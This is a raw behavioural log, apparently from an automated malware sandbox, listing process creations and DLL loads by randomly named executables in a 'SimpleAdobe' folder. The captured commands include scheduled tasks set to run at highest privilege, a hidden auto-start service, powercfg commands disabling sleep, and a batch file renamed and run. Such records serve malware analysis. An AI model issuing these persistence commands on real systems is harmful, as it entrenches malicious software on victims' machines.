Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: gpedit.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: activeds.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: dssec.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: dsuiext.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: framedynos.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: dsrole.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: logoncli.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ntdsapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: authz.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: adsldpc.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: adsldpc.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: adsldpc.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fhsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msidle.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fhcfg.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncasvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: httpprxp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wpdbusenum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: portabledeviceapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: portabledeviceconnectapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: amsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section loaded: sxs.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: amsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: sxs.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: scrrun.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: acgenral.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: samcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: msacm32.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: aclayers.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: sfc.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: ncrypt.dll
